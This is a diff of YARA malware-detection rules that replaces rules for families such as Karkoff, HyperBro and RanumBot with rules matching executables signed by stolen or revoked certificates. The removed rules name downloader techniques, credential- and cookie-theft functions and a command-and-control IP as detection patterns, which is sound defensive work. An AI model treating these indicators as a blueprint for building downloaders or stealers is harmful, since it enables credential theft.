+		thumbprint = "e7241394097402bf9e32c87cada4ba5e0d1e9923f028683713c2f339f6f59fa9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Elite Web Development Ltd." and pe.signatures [ i ] . serial == "6c:fa:50:50:c8:19:c4:ac:bb:8f:a7:59:79:68:8d:ff" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK03 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B8164F7143E1A313003Ab0C834562F1F : FILE
 {
 	meta:
-		description = "Detects unknown malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b0711427-b6bf-5e4b-af36-9c752ead4d6c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d6ebdfb9-55db-58e2-89a8-d47d747e3432"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5267-L5280"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1465-L1476"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1a4be68206628c3addbce8b6bbc1f801e67632d4e6a6af1d45cdad833e9a991"
+		logic_hash = "77f8f125740de97e6fdd98103eefa2a431df0cbe2e7de44f7e863e22ebcfea4c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion" ascii
-		$s2 = "rundll32.exe C:\\Windows\\System32\\shimgvw.dll,ImageView_Fullscreen %s" ascii
-		$s3 = "%s.jpg" ascii
-		$s4 = "%s\\sz.txt" ascii
-		$s5 = "ChromeSecsv9867%d7.exe" ascii
-		$s6 = "%s\\appl%c.jpg" ascii
+		thumbprint = "263c636c5de68f0cd2adf31b7aebc18a5e00fc47a5e2124e2a5613b9a0247c1e"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK04 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E3C7Cc0950152E9Ceead4304D01F6C89 : FILE
 {
 	meta:
-		description = "Detects unknown malware (proxy tool)"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "6a178f37-a9fd-5a83-a550-c6333342ac9b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8bea34fa-3620-5f5f-895f-3baa3b7b458a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5282-L5296"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1478-L1489"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ba6e5bbc1d094b23e3870af963503d1ccbcd56adc24126b4a38b77d4b88b4b67"
+		logic_hash = "395ed4c9c8668f6416632f85883c5fd5b6038ce8388410f22bcbe2a9e6281c35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "127.0.0.1/%d" fullword ascii
-		$x2 = "SYSTEM\\CurrentControlSet\\SERVICES\\PORTPROXY\\V4TOV4\\TCP" fullword ascii
-		$x3 = "%s rundll32.exe" fullword ascii
-		$s1 = "kxetray.exe" fullword ascii
-		$s2 = "ksafe.exe" fullword ascii
-		$s3 = "Mcshield.exe" fullword ascii
-		$s4 = "Miner.exe" fullword ascii
+		thumbprint = "82975e3e21e8fd37bb723de6fdb6e18df9d0e55f0067cc77dd571a52025c6724"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DNS KOMPLEKT" and pe.signatures [ i ] . serial == "e3:c7:cc:09:50:15:2e:9c:ee:ad:43:04:d0:1f:6c:89" )
 }
-rule DITEKSHEN_MALWARE_Win_Karkoff : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6A241Ffe96A6349Df608D22C02942268 : FILE
 {
 	meta:
-		description = "Detects Karkoff"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7d2fe783-18b3-5d84-a9b5-e8e0b5a0db98"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "571f5f11-576a-511b-975d-0643ae834502"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5298-L5313"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1491-L1502"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9b6ba5be2b3cd0faa898347e57cee5a57b80b19842c3a1ddb42d620307c8b39"
+		logic_hash = "41db1a9b11e2d5b8de5ba81496d0e76ea5eddacc01c77bc28c7e05496842df04"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
-		$x2 = "CMD.exe" fullword wide
-		$x3 = "Karkoff.ProjectInstaller.resources" fullword ascii
-		$s1 = /try\shttp(s)?\s(ip|domain)/ fullword wide
-		$s2 = "Reg cleaned!" fullword wide nocase
-		$s3 = "Content-Disposition: form-data; name=\"{1}\"" fullword wide
-		$s4 = "^[A-Fa-f0-9]{8}-([A-Fa-f0-9]{4}-){3}[A-Fa-f0-9]{12}$" fullword wide
-		$s5 = "new backdoor" fullword wide
+		thumbprint = "f97f4b9953124091a5053712b2c22b845b587cb2655156dcafed202fa7ceeeb1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 4 of ( $s* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HELP, d.o.o." and pe.signatures [ i ] . serial == "6a:24:1f:fe:96:a6:34:9d:f6:08:d2:2c:02:94:22:68" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent09 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00C04F5D17Af872Cb2C37E3367Fe761D0D : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "90f71ac7-19d9-5a8e-9830-df2f16e12c9b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9d008f04-8d02-5c6b-b38d-234409cce277"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5315-L5328"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1504-L1518"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9336507fa4bb9d3a6325d5e9caafc8c4e816a0166fded7d4e53e09a87628bc89"
+		logic_hash = "7fa0d16600ae89e41d7b2b0655b142ea36202e8bbbf5f8e25cbb45a005995e79"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$h1 = "//:ptth" ascii wide nocase
-		$h2 = "//:sptth" ascii wide nocase
-		$s1 = "DownloadString" fullword ascii wide
-		$s2 = "StrReverse" fullword ascii wide
-		$s3 = "FromBase64String" fullword ascii wide
-		$s4 = "WebClient" fullword ascii wide
+		thumbprint = "7f52ece50576fcc7d66e028ecec89d3faedeeedb953935e215aac4215c9f4d63"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $h* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Coinminingbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : FILE
 {
 	meta:
-		description = "Detects coinmining bot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df15bfbd-f531-5eaa-b160-ad8a1fbe992f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e6bd4476-d287-54d9-82b3-d80f328d7831"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5330-L5343"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1520-L1531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a307a6c9184e8f4068cfa89a8432ae017c8aab10b706ba065051f8749860c15c"
+		logic_hash = "0c804e7f1e43a98b150a97adcbba882f7764000abdf7c7408e3361aefa9298b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "FullScreenDetect" fullword ascii
-		$s2 = "GetChildProcesses" fullword ascii
-		$s3 = "HideBotPath" fullword ascii
-		$s4 = "Inject" fullword ascii
-		$s5 = "DownloadFile" fullword ascii
-		$s6 = "/Data/GetUpdateInfo" wide
+		thumbprint = "f91d436c1c7084b83007f032ef48fecda382ff8b81320212adb81e462976ad5a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Fyanti : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : FILE
 {
 	meta:
-		description = "Hunt for FYAnti third-stage loader DLLs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7a1f913c-d83f-50e9-943c-246c4c71c654"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f77ccdb6-77b6-5c47-bde6-2b1b449f9533"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5345-L5351"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1533-L1544"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "baaeef0b1452d7ea41ffaaff592cac2c5e16f921dbbfb3a300a63e69f134e9d0"
+		logic_hash = "fc8073ebb9847d642f15cc74859b643afe00b3c331f68c06f3ff62c037225201"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "59fe580974e2f813c2a00b4be01acd46c94fdea89a3049433cd5ba5a2d96666d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "FuckYouAnti" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlagent10 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B2E730B0526F36Faf7D093D48D6D9997 : FILE
 {
 	meta:
-		description = "Detects known downloader agent"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b5807adf-9d15-5e08-97fb-a529acb1c1eb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7c74d3aa-dc4f-51ed-9574-74e0539cd22b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5353-L5364"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1546-L1557"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74647b39331727000608bc89b30189d802e62d59876659d4477deb4da2fcfe13"
+		logic_hash = "16c50b7a2b7b55662d5cdb2261a6b352657b2689a9328916fcf63ddfbef5d08f"
 		score = 75
-		quality = 67
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "powershell.exe" ascii wide nocase
-		$s2 = ".DownloadFile(" ascii wide nocase
-		$s3 = "_UseShellExecute" ascii wide nocase
-		$s4 = "_CreateNoWindow" ascii wide nocase
+		thumbprint = "10dd41eb9225b615e6e4f1dce6690bd2c8d055f07d4238db902f3263e62a04a9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" )
 }
-rule DITEKSHEN_MALWARE_Win_Pureloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2C90Eaf4De3Afc03Ba924C719435C2A3 : FILE
 {
 	meta:
-		description = "Detects Pure loader / injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ad44a12a-4ac7-5cc7-92ab-13c23514de69"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0b1ae208-bf81-55d0-b4e5-b1c1f7556387"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5366-L5382"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1559-L1570"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f0bd20e769ea79d28d6e60ca06aa8aa2b3436426cfe0cd4f2023a08236875cd"
+		logic_hash = "792898b34ebe4dfc603b3f3b54777a86827a52fd3699a799e95c436317be77da"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "InvokeMember" fullword wide
-		$s2 = "ConcatProducer" fullword wide
-		$s3 = ".Classes.Resolver" wide
-		$s4 = "get_DLL" fullword ascii
-		$s5 = "BufferedStream" fullword ascii
-		$s6 = "GZipStream" fullword ascii
-		$s7 = "MemoryStream" fullword ascii
-		$s8 = "Decompress" fullword ascii
-		$s9 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
+		thumbprint = "6b916111ffbd6736afa569d7d940ada544daf3b18213a0da3025b20973a577dc"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" )
 }
-rule DITEKSHEN_MALWARE_Win_VBS_Dlagent01
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : FILE
 {
 	meta:
-		description = "Detects VBS MSHTA downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "447ea323-ecab-5f6b-b13e-0690254c754e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9c91e39e-a120-537d-a24c-f0b8ffe9dd6e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5384-L5395"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1572-L1583"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e47839a55773764aca0aebcf1078c06c729b86d1e2f18d7d64e3bb11e87f3eb"
+		logic_hash = "90c695b0cffd4786471faca21b77161ae6e930540766c4f18796a7adea74b6f5"
 		score = 75
 		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "llehS.tpircsW" ascii
-		$s2 = ".Run" ascii
-		$s3 = "mshta http" ascii nocase
-		$s4 = "StrReverse" ascii
+		tags = "FILE"
+		thumbprint = "a3b0a1cd3998688f294838758688f96adee7d5aa98ec43709b8868d6914e96c1"
+		importance = 20
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" )
 }
-rule DITEKSHEN_MALWARE_Win_Ranumbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E38259Cf24Cc702Ce441B683Ad578911 : FILE
 {
 	meta:
-		description = "Detects RanumBot / Windigo / GoStealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "26a0832e-8a39-5a0e-bd39-710744212c16"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "79e00e92-4ddb-5f87-8f60-78f326674c66"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5397-L5430"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1585-L1596"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9c32445e62d072e4184d25497696ef6225edb176dc7a9743a54194d4ddb4b0c"
+		logic_hash = "53d135553b88484e2c40976a9eaa0eb3f4f34c40ce775c198dfd6552155d1859"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$f1 = "main.addSchedulerTaskSSH" fullword ascii
-		$f2 = "main.attackRouter" fullword ascii
-		$f3 = "main.decryptPassword" fullword ascii
-		$f4 = "main.handleScanRequest" fullword ascii
-		$f5 = "main.scanNetwork" fullword ascii
-		$f6 = "main.extractCredentials" fullword ascii
-		$s1 = "H_T= H_a= H_g= MB,  W_a= and  h_a= h_g= h_t= max= ptr  siz= tab= top= u_a= u_g=%s/16%s:%d%s:22+0330+0430+0530+0545+0630+0845+10" ascii
-		$s2 = "<== as  at  fp= is  lr: of  on  pc= sp: sp=) = ) m=+Inf, n -Inf00%x112212343125: p=ABRTACDTACSTAEDTAESTAKDTAKSTALRMAWSTAhomAtoiCESTChamDashEESTGOGCJulyJuneKILLLEAFLisuMiaoModiNZDTNZSTNewaPIPEQUITSASTSEGVTERMThai" ascii
-		$s3 = "W*struct { P *big.Int; Q *big.Int; G *big.Int; Y *big.Int; Rest []uint8 \"ssh:\\\"rest\\\"\" }" ascii
-		$s4 = "policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write" ascii
-		$s5 = "/Users/alexander/go/src/mikrotik/winbox.go" ascii
-		$xf1 = "main.readConfig" fullword ascii
-		$xf2 = "main.ensureRunningAsUser" fullword ascii
-		$xf3 = "main.configRegPath" fullword ascii
-		$xf4 = "main.oldConfigRegPath" fullword ascii
-		$uf1 = "main.locateChrome" fullword ascii
-		$uf2 = "main.decryptAndUploadProfile" fullword ascii
-		$uf3 = "main.decryptCookies" fullword ascii
-		$uf4 = "main.extractPasswords" fullword ascii
-		$uf5 = "main.getFirefoxProfile" fullword ascii
-		$uf6 = "main.postBrowsersData" fullword ascii
-		$uf7 = "main.uploadFirefoxProfile" fullword ascii
-		$uf8 = "main.zipFirefoxProfile" fullword ascii
-		$uf9 = /main\.detect(Browsers|Chrome|Coccoc|Edge|Firefox|InternetExplorer|Opera|Yandex)/ fullword ascii
+		thumbprint = "16304d4840d34a641f58fe7c94a7927e1ba4b3936638164525bedc5a406529f8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $f* ) or 4 of ( $s* ) or ( 2 of ( $f* ) and 2 of ( $s* ) ) or ( all of ( $xf* ) and 1 of ( $uf* ) ) or 6 of ( $uf* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" )
 }
-rule DITEKSHEN_MALWARE_Win_Dllhijacker01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4929Ab561C812Af93Ddb9758B545F546 : FILE
 {
 	meta:
-		description = "Hunt for VSNTAR21 / DllHijacker01 IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0a858058-310a-5b1c-a6fe-abdec7b25abe"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e57e442a-6fe3-5d09-bbc4-d290a7a80090"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5432-L5448"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1598-L1609"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48535c0bb5342e2f91ac9d015c761d8d543b122dd3cc08b7029631fcf3037bfb"
+		logic_hash = "a03f37840b24456a4a2ef8e7c456dc99396886682156e4e95f7547bf38d8dc4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "libvlc_add_intf" fullword ascii
-		$s2 = "libvlc_dllonexit" fullword ascii
-		$s3 = "libvlc_getmainargs" fullword ascii
-		$s4 = "libvlc_initenv" fullword ascii
-		$s5 = "libvlc_set_app_id" fullword ascii
-		$s6 = "libvlc_set_app_type" fullword ascii
-		$s7 = "libvlc_set_user_agent" fullword ascii
-		$s8 = "libvlc_wait" fullword ascii
-		$s9 = "dll.dll" fullword ascii
+		thumbprint = "0946bf998f8a463a1c167637537f3eba35205b748efc444a2e7f935dc8dd6dc7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" )
 }
-rule DITEKSHEN_MALWARE_Win_Hyperbro02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B649A966410F62999C939384Af553919 : FILE
 {
 	meta:
-		description = "Detects HyperBro IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1880afd7-ca06-5b43-af8f-e791ded0d7d8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6b88b712-6d25-5152-80bf-562bf82f336c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5450-L5474"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1611-L1622"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca4ee116516549fc42f7e32b3c24d631b7f2c638efbde5c07227358e78fd6f35"
+		logic_hash = "231b0aa0a1e7c72552d683cc4f93b39444f7c1ebb3bb719bee224aa62e9a28dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\cmd.exe /A" fullword wide
-		$s2 = "C:\\windows\\explorer.exe" fullword wide
-		$s3 = "\\\\.\\pipe\\testpipe" fullword wide
-		$s4 = "Elevation:Administrator!new:{" wide
-		$s5 = "log.log" fullword wide
-		$s6 = "%s\\%d.exe" fullword wide
-		$s7 = ".?AVTPipeProtocol@@" fullword ascii
-		$s8 = ".?AVTCaptureMgr@@" fullword ascii
-		$s9 = "system-%d" fullword wide
-		$s10 = "[test] %02d:%02d:%02d:%03d %s" fullword wide
-		$s11 = "\\..\\data.dat" fullword wide
-		$s12 = "\\..\\config.ini" fullword wide
-		$s13 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 77 00 6f 00 72 00 6b 00 65 00 72 00 }
-		$s14 = { 73 00 76 00 63 00 68 00 6f 00 73 00 74 00 2e 00 65 00 78 00 65 00 00 00 20 00 2d 00 64 00 61 00 65 00 6d 00 6f 00 6e 00 }
-		$cnc1 = "https://%s:%d/ajax" fullword wide
-		$cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide
-		$cnc3 = "139.180.208.225" fullword wide
+		thumbprint = "a0c6cd25e1990c0d03b6ec1ad5a140f2c8014a8c2f1f4f227ee2597df91a8b6c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 2 of ( $cnc* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" )
 }
-rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_22367Dbefd0A325C3893Af52547B14Fa : FILE
 {
 	meta:
-		description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "301f126d-1ff6-5512-a38b-ca1dd7d67765"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5512-L5527"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1624-L1635"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9"
